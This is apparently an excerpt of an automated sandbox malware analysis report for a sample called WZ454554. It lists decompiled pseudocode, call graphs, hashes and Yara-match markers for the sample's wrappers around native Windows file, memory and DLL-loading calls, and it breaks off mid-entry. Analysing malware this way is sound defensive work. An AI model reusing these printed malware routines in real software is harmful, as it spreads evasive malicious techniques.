25767->25768 25769 41a1b0 LdrLoadDll 25768->25769 25770 40cf65 25769->25770 25771 40cf6c 25770->25771 25778 41a1f0 25770->25778 25771->25763 25775 40cfa7 25776 41a460 2 API calls 25775->25776 25777 40cfca 25776->25777 25777->25763 25779 41a20c 25778->25779 25780 41af30 LdrLoadDll 25778->25780 25784 af9710 LdrInitializeThunk 25779->25784 25780->25779 25781 40cf8f 25781->25771 25783 41a7e0 LdrLoadDll 25781->25783 25783->25775 25784->25781 25786 41af30 LdrLoadDll 25785->25786 25787 41a56c 25786->25787 25790 af9a00 LdrInitializeThunk 25787->25790 25788 419b99 25788->25745 25788->25748 25790->25788 25792 408328 25791->25792 25793 40acf0 LdrLoadDll 25792->25793 25794 408343 25793->25794 25795 414e50 LdrLoadDll 25794->25795 25796 408353 25795->25796 25797 40835c PostThreadMessageW 25796->25797 25798 408370 25796->25798 25797->25798 25798->25718 25800 40f683 25799->25800 25806 419e60 25800->25806 25804 419d3c 25803->25804 25805 41af30 LdrLoadDll 25803->25805 25804->25726 25805->25804 25807 41af30 LdrLoadDll 25806->25807 25808 419e7c 25807->25808 25811 af9840 LdrInitializeThunk 25808->25811 25809 40f6ae 25809->25718 25811->25809 25812->25649 25814 419fac 25813->25814 25815 41af30 LdrLoadDll 25813->25815 25818 af99a0 LdrInitializeThunk 25814->25818 25815->25814 25816 40f4fe 25816->25655 25816->25656 25818->25816 25819->25661 25820->25666 25821->25671 25824 af9540 LdrInitializeThunk

                            Executed Functions

                            Function 0041A3DB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 41a3db-41a429 call 41af30 NtReadFile
                            APIs
                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: 1JA$rMA$rMA
                            • API String ID: 2738559852-782607585
                            • Opcode ID: b54c3958ae1abab019ccd9783c45430143218e71cb73861a855abf43300cd2c9
                            • Instruction ID: b1b2274da202c843c199aaf871e6bf1d1e99413b206f0c07fe2b57a315cb0f00
                            • Opcode Fuzzy Hash: b54c3958ae1abab019ccd9783c45430143218e71cb73861a855abf43300cd2c9
                            • Instruction Fuzzy Hash: FAF0F4B2200108AFCB18CF89CC80EEB77A9EF8C754F118249BA0DD7241C630E811CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A3E0, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
                            C-Code - Quality: 25%
                            			E0041A3E0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, signed char _a36, void* _a40) {
				void* _v5;
				signed char _t15;
				void* _t19;
				intOrPtr _t21;
				void* _t28;
				intOrPtr* _t29;

				_t13 = _a4;
				_t29 = _a4 + 0xc48;
				E0041AF30(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t15 = _a36;
				_t6 =  &_a32; // 0x414d72
				_t21 =  *_t6;
				asm("les edx, [edx+edx*2]");
				_t12 =  &_a8; // 0x414d72
				_t19 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28, _t21, _t15 & 0x00000083); // executed
				return _t19;
			}









                            0x0041a3e3
                            0x0041a3ef
                            0x0041a3f7
                            0x0041a3ff
                            0x0041a402
                            0x0041a402
                            0x0041a406
                            0x0041a41d
                            0x0041a425
                            0x0041a429

                            APIs
                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: 1JA$rMA$rMA
                            • API String ID: 2738559852-782607585
                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                            • Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A387, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 17 41a387-41a38b 18 41a403-41a429 NtReadFile 17->18 19 41a38e 17->19 19->18
                            C-Code - Quality: 29%
                            			E0041A387(signed int __eax, void* __ecx, intOrPtr* __esi) {
				void* __ebp;
				signed char _t8;
				void* _t12;
				void* _t21;
				void* _t22;

				_t8 = __eax ^ 0x00000091;
				asm("bound esp, [esi]");
				if(_t8 != 0) {
					_t22 = _t21 - 1;
					asm("les edx, [edx+edx*2]");
					_push(_t8 & 0x00000083);
					_push( *((intOrPtr*)(_t22 + 0x20)));
					_push( *((intOrPtr*)(_t22 + 0x1c)));
					_push( *((intOrPtr*)(_t22 + 0x18)));
					_t6 = _t22 + 0xc; // 0x414d72
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 + 0x10)));
					_push( *_t6); // executed
					_t12 =  *((intOrPtr*)( *__esi))(); // executed
					return _t12;
				} else {
					return _t8;
				}
			}








                            0x0041a387
                            0x0041a389
                            0x0041a38b
                            0x0041a403
                            0x0041a406
                            0x0041a40c
                            0x0041a414
                            0x0041a418
                            0x0041a41c
                            0x0041a41d
                            0x0041a420
                            0x0041a423
                            0x0041a424
                            0x0041a425
                            0x0041a429
                            0x0041a38e
                            0x0041a38e
                            0x0041a390

                            APIs
                            • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileRead
                            • String ID: rMA$rMA
                            • API String ID: 2738559852-216511022
                            • Opcode ID: 3beebde864bddc8fe2478d90795474c6982e5c4089da105723dad84871a9f1ad
                            • Instruction ID: 8304010f49937db8caef015eb71e6edd3eb905a5ddee519ee8f6c144729166f1
                            • Opcode Fuzzy Hash: 3beebde864bddc8fe2478d90795474c6982e5c4089da105723dad84871a9f1ad
                            • Instruction Fuzzy Hash: D3E0EDB2214009AB8B14DF88D880CEBB3A9FB8C3007108608FA5883100C630E962DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 264 40acf0-40ad0c 265 40ad14-40ad19 264->265 266 40ad0f call 41cc30 264->266 267 40ad1b-40ad1e 265->267 268 40ad1f-40ad2d call 41d050 265->268 266->265 271 40ad3d-40ad4e call 41b470 268->271 272 40ad2f-40ad3a call 41d2d0 268->272 277 40ad50-40ad64 LdrLoadDll 271->277 278 40ad67-40ad6a 271->278 272->271 277->278
                            C-Code - Quality: 100%
                            			E0040ACF0(void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC30( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D050(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2D0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B470(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                            0x0040ad0c
                            0x0040ad0f
                            0x0040ad14
                            0x0040ad19
                            0x0040ad23
                            0x0040ad28
                            0x0040ad2b
                            0x0040ad2d
                            0x0040ad35
                            0x0040ad3a
                            0x0040ad3a
                            0x0040ad41
                            0x0040ad49
                            0x0040ad4c
                            0x0040ad4e
                            0x0040ad62
                            0x00000000
                            0x0040ad64
                            0x0040ad6a
                            0x0040ad1e
                            0x0040ad1e
                            0x0040ad1e

                            APIs
                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: Load
                            • String ID:
                            • API String ID: 2234796835-0
                            • Opcode ID: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
                            • Instruction ID: 7435202e8c2424d374e436f157d00fb34b53d81c2f6da2748dfdf88e1812e125
                            • Opcode Fuzzy Hash: dc3a20c1ec50d06182a7a0d09a3226b614d41f62ab50fc3b2a934671b827885c
                            • Instruction Fuzzy Hash: C9015EB6D0020DBBDB10DBA1DC42FDEB3789F54308F0041AAA908A7281F634EB54CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A330, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 279 41a330-41a381 call 41af30 NtCreateFile
                            C-Code - Quality: 100%
                            			E0041A330(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                            0x0041a33f
                            0x0041a347
                            0x0041a37d
                            0x0041a381

                            APIs
                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                            • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A50B, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 282 41a50b-41a54d call 41af30 NtAllocateVirtualMemory
                            C-Code - Quality: 58%
                            			E0041A50B(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				0x8b55();
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041AF30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                            0x0041a50b
                            0x0041a513
                            0x0041a51f
                            0x0041a527
                            0x0041a549
                            0x0041a54d

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: ac63e1ff312f8d9b2955ccfcf290add0f48ee18ae22ade3da3512b40bd5b7b87
                            • Instruction ID: fa6ee69f31b3fd6a81802684e9423ad03f865db94f8c8e955cac2f007a93c870
                            • Opcode Fuzzy Hash: ac63e1ff312f8d9b2955ccfcf290add0f48ee18ae22ade3da3512b40bd5b7b87
                            • Instruction Fuzzy Hash: 5DF01CB5210108AFDB14DF99CC81EEB77ADBF8C754F158549FA18A7241C630E811CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A510, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 286 41a510-41a526 287 41a52c-41a54d NtAllocateVirtualMemory 286->287 288 41a527 call 41af30 286->288 288->287
                            C-Code - Quality: 100%
                            			E0041A510(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                            0x0041a51f
                            0x0041a527
                            0x0041a549
                            0x0041a54d

                            APIs
                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateMemoryVirtual
                            • String ID:
                            • API String ID: 2167126740-0
                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                            • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A45A, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 289 41a45a-41a45d 290 41a454-41a459 289->290 291 41a45f-41a489 call 41af30 NtClose 289->291
                            C-Code - Quality: 43%
                            			E0041A45A(void* __edx, void* __eflags, long _a4, void* _a8) {
				void* _v117;
				long* __esi;
				intOrPtr* _t6;

				asm("in eax, dx");
				asm("in eax, 0x13");
				if(__eflags <= 0) {
					return  *_t6(__edx);
				} else {
					__eflags = __edx;
					__ebp = __esp;
					__eax = _a4;
					_t3 = __eax + 0x10; // 0x300
					_t4 = __eax + 0xc50; // 0x40a943
					__esi = _t4;
					__eax = E0041AF30(__edi, _a4, __esi,  *_t3, 0, 0x2c);
					__edx = _a8;
					__eax =  *__esi;
					__eax = NtClose(_a8); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}






                            0x0041a45a
                            0x0041a45b
                            0x0041a45d
                            0x0041a459
                            0x0041a45f
                            0x0041a45f
                            0x0041a461
                            0x0041a463
                            0x0041a466
                            0x0041a46f
                            0x0041a46f
                            0x0041a477
                            0x0041a47c
                            0x0041a47f
                            0x0041a485
                            0x0041a487
                            0x0041a488
                            0x0041a489
                            0x0041a489

                            APIs
                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: fc464e479884def74782264acedb1f4132a6d83a550a9528cf1dc9a75cb4aba3
                            • Instruction ID: f31503ba9b1e1c32a271491472e21684d6a5e7844ed2701bf49f06805bc22911
                            • Opcode Fuzzy Hash: fc464e479884def74782264acedb1f4132a6d83a550a9528cf1dc9a75cb4aba3
                            • Instruction Fuzzy Hash: DBE0DF76600114ABE720EBE8DCC5EEB7728EF84360F00416AF91CDB202C634E511CA90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041A460, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0041A460(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                            0x0041a463
                            0x0041a466
                            0x0041a46f
                            0x0041a477
                            0x0041a485
                            0x0041a489

                            APIs
                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close
                            • String ID:
                            • API String ID: 3535843008-0
                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                            • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                            • Instruction ID: b39a88afcfee89752d381567343b55fa3eb99d4b6067ad06a13de3de3180f2c5
                            • Opcode Fuzzy Hash: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                            • Instruction Fuzzy Hash: 1490027220108802E2206199840474A0445D7D0341F55C465A442465CD86D588A1B161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                            • Instruction ID: 38c60c9c5987a87ade63d86acf0ad3c52234d84a5a182d682657b57437046be7
                            • Opcode Fuzzy Hash: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                            • Instruction Fuzzy Hash: C190026260100502E21171994404616044AD7D0381F91C076A102455DECAA589A2F171
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                            • Instruction ID: 721f9cb85ee728b2a5c9d17bf2a08e603cc9c910fa433705a222a7d8d73de292
                            • Opcode Fuzzy Hash: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                            • Instruction Fuzzy Hash: E090026260100042925071A988449064445FBE1351751C175A0998558D85D98875A6A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                            • Instruction ID: f8dafc996cad0b1420dcb86850c8424528aa4540b361dd03382a96d5af7b2aa9
                            • Opcode Fuzzy Hash: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                            • Instruction Fuzzy Hash: 6F90027220140402E2106199481470B0445D7D0342F51C065A116455DD86A58861B5B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                            • Instruction ID: 33d3b366108972303e3c52bfb089dde854f3d0e071710561d69626bfdc4f1fd3
                            • Opcode Fuzzy Hash: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                            • Instruction Fuzzy Hash: 8890027220100413E221619945047070449D7D0381F91C466A042455CD96D68962F161
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                            • Instruction ID: 89217e3e766221b55d344b28853367cdf4ff66c9f2eed02b7efd8e73c17df286
                            • Opcode Fuzzy Hash: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                            • Instruction Fuzzy Hash: C790027220100802E2907199440464A0445D7D1341F91C069A002565CDCA958A69B7E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                            • Instruction ID: f9270b7e0f82d6f1991b7aef2c8e4c4914d400f4d228e2201784994da99aba5e
                            • Opcode Fuzzy Hash: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                            • Instruction Fuzzy Hash: 7090026224204152A655B19944045074446E7E0381791C066A1414958C85A69866E661
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                            • Instruction ID: c31aad2699236ece3cc13049112d8348dfaa9e4ebf4db858b6c1282cf15b66a9
                            • Opcode Fuzzy Hash: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                            • Instruction Fuzzy Hash: 4F90026221180042E31065A94C14B070445D7D0343F51C169A015455CCC9958871A561
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                            • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                            • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                            • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                            • Instruction ID: a49be56c60f79f66e4f4417ddec70c7bf654e831ac47f2e65f4b450003604300
                            • Opcode Fuzzy Hash: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                            • Instruction Fuzzy Hash: 8F9002A234100442E21061994414B060445D7E1341F51C069E106455CD8699CC62B166
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
